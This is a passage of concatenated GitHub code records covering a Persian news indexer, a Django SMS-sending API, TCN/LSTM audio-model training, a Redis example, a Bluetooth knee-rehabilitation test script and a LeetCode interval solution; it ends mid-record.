news.title = title\r\n news.news_id = idx - 1\r\n news.save()\r\n\r\n\r\ndef get_news_by_id(doc):\r\n return NewsModel.objects(news_id=doc)\r\n\r\n\r\ndef indexing():\r\n print(\"Creating index.txt...\")\r\n dictionary = Dictionary()\r\n to_db()\r\n doc2term = dict()\r\n docId = 0\r\n for filename in glob.glob(os.path.join(data_set, '*.csv')):\r\n print(\"Creating Index of \", filename)\r\n df = pandas.read_csv(filename, encoding='utf_8')\r\n for doc in df['content']:\r\n # total_tokens = np.zeros(df.shape[0]) #zeapf and heapf law\r\n # total_terms = np.zeros(df.shape[0]) #zeapf and heapf law\r\n # doc2term_file = open('./doc2term.txt', 'w', encoding='utf_8')\r\n print('Indexing doc ', docId)\r\n positionals = doc_tokenizer.get_tokens(doc)\r\n\r\n # if i != 0:\r\n # total_tokens[i] = total_tokens[i - 1] #zeapf and heapf law\r\n terms = []\r\n # doc2term_file.write(str(i) + ' => ')\r\n doc2term[docId] = list()\r\n\r\n for positional in positionals:\r\n # dictionary.add_term_to_dictionary(positional, i)\r\n # total_tokens[i] = total_tokens[i] + len(positional[1]) #zeapf and heapf law\r\n # terms.append((positional[0], len(positional[1]))) #zeapf and heapf law\r\n # doc2term_file.write(str(positional[0]) + ':' + str(len(positional[1])) + ',')\r\n doc2term[docId].append((str(positional[0]), len(positional[1])))\r\n if dictionary.existed_in_dictionary(positional[0]):\r\n dictionary.add_term_to_dictionary(positional, docId)\r\n # temp = dictionary.terms_cf[positional[0]] #zeapf and heapf law\r\n else:\r\n new_posting = list()\r\n new_posting.append((docId, positional[1]))\r\n dictionary.dictionary[positional[0]] = (1, new_posting)\r\n # temp = 0 # zeapf and heapf law\r\n docId += 1\r\n print(\"Done\")\r\n # dictionary.terms_cf[positional[0]] = len(positional[1]) + temp #zeapf and heapf law\r\n # doc2term_file.write('\\n')\r\n\r\n # total_terms[i] = len(dictionary.dictionary.keys())\r\n\r\n # heaps_law(total_tokens, total_terms)\r\n # zipfs_law(dictionary.terms_cf)\r\n # dict = dictionary.get_dictionary()\r\n # print(dictionary.get_dictionary()['ایران'])\r\n\r\n with open('inverted_index_500.pickle', 'wb') as handle:\r\n pickle.dump(dictionary.get_dictionary(), handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\n with open('doc2term_index_500.pickle', 'wb') as handle:\r\n pickle.dump(doc2term, handle, protocol=pickle.HIGHEST_PROTOCOL)\r\n\r\n # with open('./index.txt', 'w', encoding=\"utf_8\") as f:\r\n # for key in sorted(dict.keys()):\r\n # f.writelines([key, \" => \", str(dict[key]), \"\\n\"])\r\n print(\"Don!\")\r\n\r\n\r\ndef fetch_result(doc_list):\r\n # df = pandas.read_csv(data_set)\r\n result = []\r\n for doc_id in doc_list:\r\n # content = df['content'][doc_id]\r\n # content = doc_tokenizer.clean_html(content)\r\n # content = doc_tokenizer.text_normalizer(content)\r\n #\r\n # publish_date = df['publish_date'][doc_id]\r\n # title = df['title'][doc_id]\r\n # url = df['url'][doc_id]\r\n # summary = df['summary'][doc_id]\r\n # if type(summary) is float:\r\n # summary = ' '\r\n # meta_tags = df['meta_tags'][doc_id]\r\n # thumbnail = df['thumbnail'][doc_id]\r\n # if type(thumbnail) is float:\r\n # thumbnail = 'https://www.bvfd.com/wp-content/uploads/2015/12/placeholder.jpg'\r\n # result.append(news)\r\n q = get_news_by_id(doc_id)\r\n print(q)\r\n if len(q) > 0:\r\n nw = q[0]\r\n news = {'content': str(nw.content), 'publish_date': str(nw.publish_date), 'title': str(nw.title), 'url': str(nw.url),\r\n 'summary': str(nw.summary),\r\n 'meta_tags': nw.meta_tags, 'thumbnail': str(nw.thumbnail)}\r\n result.append(news)\r\n else:\r\n return []\r\n return result\r\n\r\n\r\ndef heaps_law(total_tokens, total_terms):\r\n total_tokens = np.log10(total_tokens)\r\n total_terms = np.log10(total_terms)\r\n x = np.linspace(0, total_tokens[len(total_tokens) - 1], 2000)\r\n y = math.log(40, 10) + (1 / 2) * x\r\n plt.plot(total_tokens, total_terms)\r\n plt.plot(x, y, '--')\r\n plt.xlabel('log10 T')\r\n plt.ylabel('log10 M')\r\n plt.title('Heap`s law')\r\n plt.savefig('./plots/heaps.png')\r\n plt.show()\r\n\r\n\r\ndef zipfs_law(terms_cf):\r\n sorted_terms_cf = [(k, terms_cf[k]) for k in sorted(terms_cf, key=terms_cf.get, reverse=True)]\r\n total_cf = []\r\n for k, v in sorted_terms_cf:\r\n total_cf.append(v)\r\n total_cf = np.array(total_cf)\r\n total_cf = np.log10(total_cf)\r\n print(total_cf)\r\n total_ranks = np.arange(len(total_cf))\r\n total_ranks = total_ranks + 1\r\n total_ranks = np.log10(total_ranks)\r\n print(total_ranks)\r\n x = np.linspace(0, total_ranks[len(total_ranks) - 1], 2000)\r\n y = math.log(10000, 10) - x\r\n plt.plot(total_ranks, total_cf)\r\n plt.plot(x, y, '--')\r\n plt.xlabel('log10 rank')\r\n plt.ylabel('log10 cf')\r\n plt.title('Zipf`s law')\r\n plt.savefig('./plots/zipfs.png')\r\n plt.show()\r\n\r\n\r\nif __name__ == '__main__':\r\n # indexing()\r\n # caltest()\r\n to_db()\r\n a = get_news_by_id([10304, 12])\r\n print(get_news_by_id([10304, 12]))\r\n # print(fetch_result([108]))\r\n # doclist = [15]\r\n # result = fetch_result(doclist)\r\n # print(result)\r\n # for r in result:\r\n # print(r['summary'])\r\n","repo_name":"parsareal/News-Search-Engine","sub_path":"TextMinning-master/index.py","file_name":"index.py","file_ext":"py","file_size_in_byte":7301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"70843477551","text":"import uuid\nimport phonenumbers\n\nfrom rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework import status\nfrom rest_framework.parsers import JSONParser\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.generics import get_object_or_404\n\nfrom sms_counter import SMSCounter\n\nfrom .models import SMSMessage, InvalidSMSMessage, SMSMessageStateLog\n\n\nclass VTigerPluginAPI(APIView):\n \"\"\" API to Send SMS \"\"\"\n parser_classes = (JSONParser,)\n permission_classes = (IsAuthenticated,)\n \n def post(self, request, format=None):\n data = request.data\n recipients = data.get(\"to\")\n sms_message = data.get(\"message\")\n \n if not recipients or len(recipients) == 0:\n return Response(\"Recipient(s) missing\", status=status.HTTP_400_BAD_REQUEST)\n \n if not sms_message:\n return Response(\"Message missing\", status=status.HTTP_400_BAD_REQUEST)\n \n result = {\n \"messages\": [],\n \"invalid_numbers\": []\n }\n \n # set bulkId\n bulk_id = None\n if len(recipients) > 1:\n bulk_id = data.get(\"bulkId\", uuid.uuid4())\n result[\"bulkId\"] = bulk_id \n \n counter = SMSCounter.count(data.get(\"message\"))\n \n for recipient in recipients:\n try:\n # this will raise an exception early if number is invalid\n phonenumbers.parse(recipient, None)\n \n m = SMSMessage.objects.create(\n id = data.get(\"messageId\", uuid.uuid4()),\n bulk_id = bulk_id,\n text = data.get(\"message\"),\n recipient = recipient,\n owner = request.user,\n pages = counter[\"messages\"]\n )\n \n result[\"messages\"].append(\n {\n \"to\": str(m.recipient),\n \"submitted\": True,\n \"messageId\": m.id,\n \"smsCount\": m.pages\n }\n ) \n except phonenumbers.phonenumberutil.NumberParseException:\n result[\"invalid_numbers\"].append(recipient)\n raise ValueError(f\"Invalid recipient number: {recipient}\")\n except ValueError as ve:\n InvalidSMSMessage.objects.create(\n text = data.get(\"message\"),\n recipient = recipient,\n user = request.user,\n message = m,\n error_reason = ve\n )\n return Response(result, status=status.HTTP_201_CREATED)\n \nclass SMSReport(APIView):\n \n permission_classes = (IsAuthenticated,)\n \n def get(self, request, messageid, format=None):\n m = get_object_or_404(SMSMessage, id=messageid, user=request.user)\n \n result = {}\n #sucessfully sent\n latest_state = m.status\n if latest_state == SMSMessage.Status.SUCCESS:\n result['sent'] = True\n result['to'] = str(m.recipient)\n result['time'] = latest_state.timestamp\n elif latest_state == SMSMessage.Status.ERROR:\n result['error'] = True\n result['errorReason'] = latest_state.state_reason \n elif latest_state == SMSMessage.Status.FAILED:\n result['failed'] = True\n \n return Response(result)","repo_name":"dedayoa/yeastar-sms-bridge","sub_path":"sms/apis.py","file_name":"apis.py","file_ext":"py","file_size_in_byte":3580,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"33956801631","text":"import os\nimport glob\nimport torch\nimport torchsummary\nfrom itertools import product\nimport pytorch_lightning as pl\nfrom argparse import ArgumentParser\n\nfrom microtcn.tcn import TCNModel\nfrom microtcn.lstm import LSTMModel\nfrom microtcn.data import SignalTrainLA2ADataset\n\ntorch.backends.cudnn.benchmark = True\n\ntrain_configs = [\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 0.01,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-100\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : True,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-1000\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 5,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : True,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-100\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-1000\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 5,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 5,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"TCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 10,\n \"dilation_growth\" : 2,\n \"kernel_size\" : 15,\n \"causal\" : False,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 0.10,\n \"batch_size\" : 32\n },\n {\"name\" : \"LSTM-32\",\n \"model_type\" : \"lstm\",\n \"num_layers\" : 1,\n \"hidden_size\" : 32,\n \"train_fraction\" : 1.00,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 3,\n \"dilation_growth\" : 60,\n \"kernel_size\" : 5,\n \"causal\" : True,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 4,\n \"dilation_growth\" : 10,\n \"kernel_size\" : 13,\n \"causal\" : True,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n \"train_loss\" : \"l1\"\n },\n {\"name\" : \"uTCN-300\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 30,\n \"dilation_growth\" : 2,\n \"kernel_size\" : 15,\n \"causal\" : False,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n },\n {\"name\" : \"uTCN-324-16\",\n \"model_type\" : \"tcn\",\n \"nblocks\" : 10,\n \"dilation_growth\" : 2,\n \"kernel_size\" : 15,\n \"causal\" : False,\n \"train_fraction\" : 1.0,\n \"batch_size\" : 32,\n \"max_epochs\" : 60,\n \"channel_width\" : 16,\n },\n]\n\nn_configs = len(train_configs)\n\nfor idx, tconf in enumerate(train_configs):\n\n #if (idx+1) not in [14]: continue\n # if you only want to train a specific model\n\n parser = ArgumentParser()\n\n # add PROGRAM level args\n parser.add_argument('--model_type', type=str, default='tcn', help='tcn or lstm')\n parser.add_argument('--root_dir', type=str, default='./data')\n parser.add_argument('--preload', action=\"store_true\")\n parser.add_argument('--sample_rate', type=int, default=44100)\n parser.add_argument('--shuffle', type=bool, default=True)\n parser.add_argument('--train_subset', type=str, default='train')\n parser.add_argument('--val_subset', type=str, default='val')\n parser.add_argument('--train_length', type=int, default=65536)\n parser.add_argument('--train_fraction', type=float, default=1.0)\n parser.add_argument('--eval_length', type=int, default=131072)\n parser.add_argument('--batch_size', type=int, default=32)\n parser.add_argument('--num_workers', type=int, default=16)\n\n # add all the available trainer options to argparse\n parser = pl.Trainer.add_argparse_args(parser)\n\n # THIS LINE IS KEY TO PULL THE MODEL NAME\n temp_args, _ = parser.parse_known_args()\n\n print(f\"* Training config {idx+1}/{n_configs}\")\n print(tconf)\n \n # let the model add what it wants\n if temp_args.model_type == 'tcn':\n parser = TCNModel.add_model_specific_args(parser)\n elif temp_args.model_type == 'lstm':\n parser = LSTMModel.add_model_specific_args(parser)\n\n # parse them args\n args = parser.parse_args()\n\n # set the seed\n pl.seed_everything(42)\n\n # only run 60 epochs\n args.max_epochs = 60\n\n # init the trainer and model \n if tconf[\"model_type\"] == 'tcn':\n specifier = f\"{idx+1}-{tconf['name']}\"\n specifier += \"__causal\" if tconf['causal'] else \"__noncausal\"\n specifier += f\"__{tconf['nblocks']}-{tconf['dilation_growth']}-{tconf['kernel_size']}\"\n specifier += f\"__fraction-{tconf['train_fraction']}-bs{tconf['batch_size']}\"\n elif tconf[\"model_type\"] == 'lstm':\n specifier = f\"{idx+1}-{tconf['name']}\"\n specifier += f\"__{tconf['num_layers']}-{tconf['hidden_size']}\"\n specifier += f\"__fraction-{tconf['train_fraction']}-bs{tconf['batch_size']}\"\n\n if \"max_epochs\" in tconf:\n args.max_epochs = tconf[\"max_epochs\"]\n else:\n args.max_epochs = 60\n\n if \"train_loss\" in tconf:\n args.train_loss = tconf[\"train_loss\"]\n specifier += f\"__loss-{tconf['train_loss']}\"\n\n args.precision = 16\n\n args.default_root_dir = os.path.join(\"lightning_logs\", \"bulk\", specifier)\n print(args.default_root_dir)\n trainer = pl.Trainer.from_argparse_args(args)\n\n # setup the dataloaders\n train_dataset = SignalTrainLA2ADataset(args.root_dir, \n subset=args.train_subset,\n fraction=tconf[\"train_fraction\"],\n half=True if args.precision == 16 else False,\n preload=args.preload,\n length=args.train_length)\n\n train_dataloader = torch.utils.data.DataLoader(train_dataset, \n shuffle=args.shuffle,\n batch_size=tconf[\"batch_size\"],\n num_workers=args.num_workers,\n pin_memory=True)\n\n val_dataset = SignalTrainLA2ADataset(args.root_dir, \n preload=args.preload,\n half=True if args.precision == 16 else False,\n subset=args.val_subset,\n length=args.eval_length)\n\n val_dataloader = torch.utils.data.DataLoader(val_dataset, \n shuffle=False,\n batch_size=8,\n num_workers=args.num_workers,\n pin_memory=True)\n\n # create the model with args\n dict_args = vars(args)\n dict_args[\"nparams\"] = 2\n\n if tconf[\"model_type\"] == 'tcn':\n dict_args[\"nblocks\"] = tconf[\"nblocks\"]\n dict_args[\"dilation_growth\"] = tconf[\"dilation_growth\"]\n dict_args[\"kernel_size\"] = tconf[\"kernel_size\"]\n dict_args[\"causal\"] = tconf[\"causal\"]\n if \"channel_width\" in tconf:\n dict_args[\"channel_width\"] = tconf[\"channel_width\"]\n model = TCNModel(**dict_args)\n elif tconf[\"model_type\"] == 'lstm':\n dict_args[\"num_layers\"] = tconf[\"num_layers\"]\n dict_args[\"hidden_size\"] = tconf[\"hidden_size\"]\n model = LSTMModel(**dict_args)\n\n # summary \n torchsummary.summary(model, [(1,65536), (1,2)], device=\"cpu\")\n\n # train!\n trainer.fit(model, train_dataloader, val_dataloader)\n","repo_name":"csteinmetz1/micro-tcn","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":8325,"program_lang":"python","lang":"en","doc_type":"code","stars":124,"dataset":"github-code","pt":"38"} +{"seq_id":"74640633391","text":"import redis\n\ntry:\n r = redis.Redis(host='localhost',\n port=6379,\n db=0)\n r.ping() # This will attempt to ping the server, and if successful, you're connected.\n print(\"Connected to Redis\")\n\n r.set('foo', 'bar') # create record\n value = r.get('foo') # read record\n\n print(value) # bar\nexcept redis.ConnectionError:\n print(\"Could not connect to Redis\")\n","repo_name":"Ruslan-Skira/goit_web","sub_path":"module08/lesson02/from_lecture/redis_l.py","file_name":"redis_l.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"38"} +{"seq_id":"29033891744","text":"# Author: Group 23 (Miguel, Akanksha, Dorian)\n# Date: March 12th 2023\n# Purpose: Showcase how to use the DataReceive.py library\n\n\nimport DataReceive # Name of the file containing the bluetooth serial object\nimport time\nimport matplotlib.pyplot as plt\nimport keyboard\nfrom email_setup import *\nfrom processing_funcs import *\nfrom plotting import *\nfrom os import listdir\nfrom os.path import isfile, join\n\n\n# setting clinician email\nclinician_email = 'knighd7@mcmaster.ca' # 'martim96@mcmaster.ca'#'nehetea@mcmaster.ca'\n\n# READ THIS COMMENT OR ELSE THERE WILL BE PROBLEMS\n\n'''Make sure to check the value of bluetoothCommObject.successfullConnect\nThis value will tell you if you're connected or not - please build a contingency plan\nin case connection is not successfully established (whether that is try again or raise some exception\n\nNote: you only need to check if the connection was successfully established at the start as the connection persists as long as the object is alive'''\n\n# Make the bluetooth object that will establish the connect and send back data\n\nbluetoothCommObject = DataReceive.bluetoothTelephone()\nif (bluetoothCommObject.successfullConnect == True):\n print(\"Connection was successfully established \\n\")\nelse:\n print(\"Connection was not successfully established\")\n\n\n# initializing arrays for holding angle data from each direction of the SEBT test for nonoperative leg\nanterior_SEBT_nonop = []\nanterolateral_SEBT_nonop = []\nanteromedial_SEBT_nonop = []\nlateral_SEBT_nonop = []\nmedial_SEBT_nonop = []\nposterolateral_SEBT_nonop = []\nposteromedial_SEBT_nonop = []\nposterior_SEBT_nonop = []\n\n# initializing arrays for holding angle data from each direction of the SEBT test for operative leg\nanterior_SEBT_op = []\nanterolateral_SEBT_op = []\nanteromedial_SEBT_op = []\nlateral_SEBT_op = []\nmedial_SEBT_op = []\nposterolateral_SEBT_op = []\nposteromedial_SEBT_op = []\nposterior_SEBT_op = []\n\n\n# arrays for holding foot center of mass data during each direction of the SEBT test for nonoperative leg\nanterior_CofMs_nonop = []\nanterolateral_CofMs_nonop = []\nanteromedial_CofMs_nonop = []\nlateral_CofMs_nonop = []\nmedial_CofMs_nonop = []\nposterolateral_CofMs_nonop = []\nposteromedial_CofMs_nonop = []\nposterior_CofMs_nonop = []\n\n# arrays for holding foot center of mass data during each direction of the SEBT test for operative leg\nanterior_CofMs_op = []\nanterolateral_CofMs_op = []\nanteromedial_CofMs_op = []\nlateral_CofMs_op = []\nmedial_CofMs_op = []\nposterolateral_CofMs_op = []\nposteromedial_CofMs_op = []\nposterior_CofMs_op = []\n\n\n# function for conducting each stage of the SEBT test\ndef conduct_stage(stage_array: list[float], leg: str, CofM_array: list[tuple], stage_name: str):\n while (1):\n\n # Call the get data function - it will return an array containing the load cell values and knee angle\n loadcells, bno, emg = bluetoothCommObject.getData()\n\n print(\"Raw Loadcell Values\" + str(loadcells))\n # print(emg)\n print(\"Knee angle: \" + str(bno))\n\n # calcluating center of mass value\n XCofM, YCofM = get_Cof_M(loadcells)\n\n # printing x and y values of center of mass for debugging purposes\n print('Center of Mass: (' + str(XCofM) + ',' + str(YCofM)+')')\n\n # adding data to arrays for later plotting\n stage_array.append(bno)\n CofM_array.append((XCofM, YCofM))\n\n time.sleep(0.150) # Sleep for 1 second\n\n if keyboard.is_pressed(' '):\n print(\n f\"SEBT test in the {stage_name} direction finished on the {leg} leg.\")\n break\n\n\n# first stage of SEBT test (anterior) on non-operative leg\ninput('Ready for anterior orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterior direction.')\nconduct_stage(anterior_SEBT_nonop, 'non-operative',\n anterior_CofMs_nonop, 'anterior')\nprint(\"Moving on to the anteromedial direction of the test.\")\n\n\n# first stage of SEBT test (anteromedial) on non-operative leg\ninput('Ready for anteromedial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anteromedial direction.')\nconduct_stage(anteromedial_SEBT_nonop, 'non-operative',\n anteromedial_CofMs_nonop, 'anteromedial')\nprint(\"Moving on to the anterolateral direction of the test.\")\n\n\n# third stage of SEBT test (anterolateral) on non-operative leg\ninput('Ready for anterolateral orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterolateral direction.')\nconduct_stage(anterolateral_SEBT_nonop, 'non-operative',\n anterolateral_CofMs_nonop, 'anterolateral')\nprint(\"Moving on to the lateral direction of the test.\")\n\n# fourth stage of SEBT test (lateral) on non-operative leg\ninput('Ready for lateral orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the lateral direction.')\nconduct_stage(lateral_SEBT_nonop, 'non-operative',\n lateral_CofMs_nonop, 'lateral')\nprint(\"Moving on to the posterolateral direction of the test.\")\n\n# fifth stage of SEBT test (posterolateral) on non-operative leg\ninput('Ready for posterolateral orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterolateral direction.')\nconduct_stage(posterolateral_SEBT_nonop, 'non-operative',\n posterolateral_CofMs_nonop, 'posterolateral')\nprint(\"Moving on to the posterior direction of the test.\")\n\n# sixth stage of SEBT test (posterior) on non-operative leg\ninput('Ready for posterior orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posterior_SEBT_nonop, 'non-operative',\n posterior_CofMs_nonop, 'posterior')\nprint(\"Moving on to the posteromedial direction of the test.\")\n\n# seventh stage of SEBT test (posteriomedial) on non-operative leg\ninput('Ready for posteromedial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posteromedial_SEBT_nonop, 'non-operative',\n posteromedial_CofMs_nonop, 'posteromedial')\nprint(\"Moving on to the medial direction of the test.\")\n\n# eighth stage of SEBT test (medial) on non-operative leg\ninput('Ready for medial orientation SEBT test on the non-operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the medial direction.')\nconduct_stage(medial_SEBT_nonop, 'non-operative', medial_CofMs_nonop, 'medial')\nprint(\"SEBT testing for the non-operative leg finished. Please place the apparatus on the operative leg in order to conduct the test again.\")\n\n# first stage of SEBT test (anterior) on operative leg\ninput('Ready for anterior orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterior direction.')\nconduct_stage(anterior_SEBT_op, 'operative',\n anterior_CofMs_op, 'anterior')\nprint(\"Moving on to the anteromedial direction of the test.\")\n\n\n# first stage of SEBT test (anteromedial) on operative leg\ninput('Ready for anteromedial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anteromedial direction.')\nconduct_stage(anteromedial_SEBT_op, 'operative',\n anteromedial_CofMs_op, 'anteromedial')\nprint(\"Moving on to the anterolateral direction of the test.\")\n\n\n# third stage of SEBT test (anterolateral) on operative leg\ninput('Ready for anterolateral orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the anterolateral direction.')\nconduct_stage(anterolateral_SEBT_op, 'operative',\n anterolateral_CofMs_op, 'anterolateral')\nprint(\"Moving on to the lateral direction of the test.\")\n\n# fourth stage of SEBT test (lateral) on operative leg\ninput('Ready for lateral orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the lateral direction.')\nconduct_stage(lateral_SEBT_op, 'operative',\n lateral_CofMs_op, 'lateral')\nprint(\"Moving on to the posterolateral direction of the test.\")\n\n# fifth stage of SEBT test (posterolateral) on operative leg\ninput('Ready for posterolateral orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterolateral direction.')\nconduct_stage(posterolateral_SEBT_op, 'operative',\n posterolateral_CofMs_op, 'posterolateral')\nprint(\"Moving on to the posterior direction of the test.\")\n\n# sixth stage of SEBT test (posterior) on operative leg\ninput('Ready for posterior orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posterior_SEBT_op, 'operative',\n posterior_CofMs_op, 'posterior')\nprint(\"Moving on to the posteromedial direction of the test.\")\n\n# seventh stage of SEBT test (posteriomedial) on operative leg\ninput('Ready for posteromedial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the posterior direction.')\nconduct_stage(posteromedial_SEBT_op, 'operative',\n posteromedial_CofMs_op, 'posteromedial')\nprint(\"Moving on to the medial direction of the test.\")\n\n# eighth stage of SEBT test (medial) on operative leg\ninput('Ready for medial orientation SEBT test on the operative leg? Press Enter to Continue.')\nprint('Press spacebar key upon completion of the medial direction.')\nconduct_stage(medial_SEBT_op, 'operative', medial_CofMs_op, 'medial')\nprint(\"SEBT testing for the operative leg finished. Finished testing, please remove apparatus.\")\n\n\n# debugging purposes\nSEBT_data = {\n 'Anterior': [anterior_SEBT_op, anterior_SEBT_nonop],\n 'Anterolateral': [anterolateral_SEBT_op, anterolateral_SEBT_nonop],\n 'Anteromedial': [anteromedial_SEBT_op, anteromedial_SEBT_nonop],\n 'Lateral': [lateral_SEBT_op, lateral_SEBT_nonop],\n 'Medial': [medial_SEBT_op, medial_SEBT_nonop],\n 'Posterolateral': [posterolateral_SEBT_op, posterolateral_SEBT_nonop],\n 'Posteromedial': [posteromedial_SEBT_op, posteromedial_SEBT_nonop],\n 'Posterior': [posterior_SEBT_op, posterior_SEBT_nonop]\n}\n\nCofM_data = {\n 'Anterior': [anterior_CofMs_op, anterior_CofMs_nonop],\n 'Anterolateral': [anterolateral_CofMs_op, anterolateral_CofMs_nonop],\n 'Anteromedial': [anteromedial_CofMs_op, anteromedial_CofMs_nonop],\n 'Lateral': [lateral_CofMs_op, lateral_CofMs_nonop],\n 'Medial': [medial_CofMs_op, medial_CofMs_nonop],\n 'Posterolateral': [posterolateral_CofMs_op, posterolateral_CofMs_nonop],\n 'Posteromedial': [posteromedial_CofMs_op, posteromedial_CofMs_nonop],\n 'Posterior': [posterior_CofMs_op, posterior_CofMs_nonop]\n}\n\n\nfor item in SEBT_data:\n plot_SEBT_graph(SEBT_data[item][0], SEBT_data[item][1], item)\nprint(\"graphs saved to folder\")\n\n# debugging, remove later\n#print(SEBT_data)\n\n# debugging, remove later\n#print(CofM_data)\n\n# saving CofM images to folder\nfor item in CofM_data:\n plot_CofM_deviations(CofM_data[item][0], CofM_data[item][1], item)\n\n\n# getting filenames to send as attachments\nanglefiles = ['sebt/' + f for f in listdir('sebt') if isfile(join('sebt', f))]\nCofMfiles = ['CofM_images/' +\n f for f in listdir('CofM_images') if isfile(join('CofM_images', f))]\n\nfile_names = anglefiles + CofMfiles\n\nsend_emails([clinician_email], file_names, SEBT_data, CofM_data)\n","repo_name":"DorianKnight/IBEHS-3P04-ACL-Reconstruction","sub_path":"Testreceive.py","file_name":"Testreceive.py","file_ext":"py","file_size_in_byte":11797,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"41538224999","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\n#np.random.seed(1234)\n#print(np.random.randn(4))\n\nX = np.array([[147, 150, 153, 158, 163, 165, 168, 170, 173, 175, 178, 180, 183]]).transpose()\ny = np.array([[5, 6, 7, 8, 9, 10]])\none = np.ones((X.shape[0], 1))\ntest = np.concatenate((one, X), axis = 1)\nprint(X)\nprint(test)","repo_name":"phamquanganhBKSET/machine_learning","sub_path":"math/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"38"} +{"seq_id":"40600068606","text":"# Definition for an interval.\nclass Interval(object):\n def __init__(self, s=0, e=0):\n self.start = s\n self.end = e\n\nclass Solution(object):\n def insert(self, intervals, newInterval):\n \"\"\"\n :type intervals: List[Interval]\n :type newInterval: Interval\n :rtype: List[Interval]\n \"\"\"\n\n n = len(intervals)\n overlap = 0 # 重叠区间数\n i = 0\n while i < n:\n # 1. 如果新区间的末尾小于当前区间的开头,则跳出循环\n if newInterval.end < intervals[i].start:\n break\n # 2. 如果新区间的开头大于当前区间的末尾,不作处理\n elif newInterval.start > intervals[i].end:\n pass\n # 3. 如果新区间和当前区间有重叠,合并区间\n else:\n newInterval.start = min(intervals[i].start, newInterval.start)\n newInterval.end = max(intervals[i].end, newInterval.end)\n overlap += 1\n i += 1\n\n # 如果有区间重叠,删除数组中所有与新区间重叠的区间\n if overlap > 0:\n intervals = intervals[:i-overlap] + intervals[i:]\n intervals.insert( i - overlap, newInterval)\n return intervals\n \n \n \nintervals = []\ntmp = Interval(1,3)\nintervals.append(tmp)\ntmp = Interval(6,9)\nintervals.append(tmp)\n# tmp = Interval(2,6)\n# intervals.append(tmp)\n# tmp = Interval(15,18)\n# intervals.append(tmp)\n\nnewInterval = Interval(0, 